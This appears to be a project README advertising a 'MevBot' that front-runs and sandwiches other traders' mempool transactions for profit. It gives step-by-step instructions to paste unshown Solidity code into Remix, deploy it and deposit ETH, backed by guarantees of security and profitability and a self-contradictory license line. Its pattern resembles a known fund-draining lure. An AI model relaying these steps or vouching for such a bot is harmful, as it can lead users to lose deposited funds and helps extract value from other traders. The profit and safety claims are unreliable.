
Earn money with MEV (Mev Bot)

Primary LanguageSolidityMIT LicenseMIT


MEV, or Miner Extractable Value, is a term used in the context of blockchain technology and cryptocurrencies that describes the potential profit a miner can extract from certain transactions or actions within the blockchain.

MevBot is an effective tool for working with blockchain, operating 24/7. Its task is to scan the transaction pool and quickly respond to changes, buying before transactions and selling after, in order to generate profit.


  • Responsiveness and accuracy: MevBot quickly analyzes the transaction pool and instantly responds to changes.

  • Ease of use: We have made MevBot convenient and understandable to use, making it accessible even for beginners.

  • Profitability: MevBot increases your profit by buying before and selling after transactions, allowing you to optimize your blockchain investments.

  • Operates round the clock: MevBot operates 24/7, providing continuous scanning and response to transactions.

  • Security: MevBot was developed with high security standards in mind, guaranteeing the reliability of your transactions.

  • Mempool Scanning MEVBOT continuously analyzes the mempool, identifying unconfirmed but potentially profitable transactions.

  • Buying & Selling Strategy MEVBOT automatically buys tokens ahead of the confirmation of a profitable transaction and sells them right after the confirmation.

  • Individual Contracts Each MEVBOT contract is created individually for each user. This ensures maximum security as no one but you has direct access to your wallet.

  • Autonomous Usage Once created, MEVBOT is entirely under your control. You decide when and how to launch your bot to start scanning the mempool and carrying out buying and selling operations.

MEVBOT is your personalized assistant in the world of cryptocurrencies, tirelessly working to help you get the maximum return on your investments.

Platform Comparison

UPD: Mempool Scan Time

Platform Router Address Network Mempool Scan Time
Pancakeswap 0x10ED43C718714eb63d5aA57B78B54704E256024E BSC 0.53 sec
Uniswap 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D ETH 0.22 sec

How to Use MEVBot (Exemple)


Example of the bot's operation, which is shown in the screenshots.

bot work

The bot only works with the main network.

Step 1: Access the Source Code

  1. Navigate to the Remix IDE: https://remix.ethereum.org/
  2. Create a new file "MevBot.sol".
  3. Copy this code and paste it into the Remix IDE. 1

Step 2: Compile the Code

  1. Select the Solidity compiler 0.6.12.
  2. Click 'Compile MevBot.sol'. 2

Step 3: Choose the Network

  1. Select either ETH or BSC (BNB) network. 3

Step 4: Deploy the Code

  1. Click 'Transact (Deploy)'.

Step 5: Deposit into MEVBot

  1. Copy your MEV contract and send an amount of Ethereum for the bot's operation.
  2. Start the bot by pressing the 'Start' button. 4 5

Note: For successful transactions on the Ethereum network, you must have sufficient balance to cover the gas fees. We recommend a minimum of 0.25-1 ETH. The bot uses a small portion of its resources to pay for gas. In order to prioritize the transaction, it increases the gas price of the attacked transaction.

You can withdraw funds by clicking the 'Stop' and 'Withdrawal' button.*

UPD: If you have closed the Remix IDE website or accidentally rebooted your computer, you can still access all the bot's functions through Etherscan You will need to verify the bot contract on Etherscan, and you will have access to the same functions as you would through the Remix IDE website.

Copyright (C) 2023

This program is free software: you can redistribute and/or modify it under the terms of the MIT Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.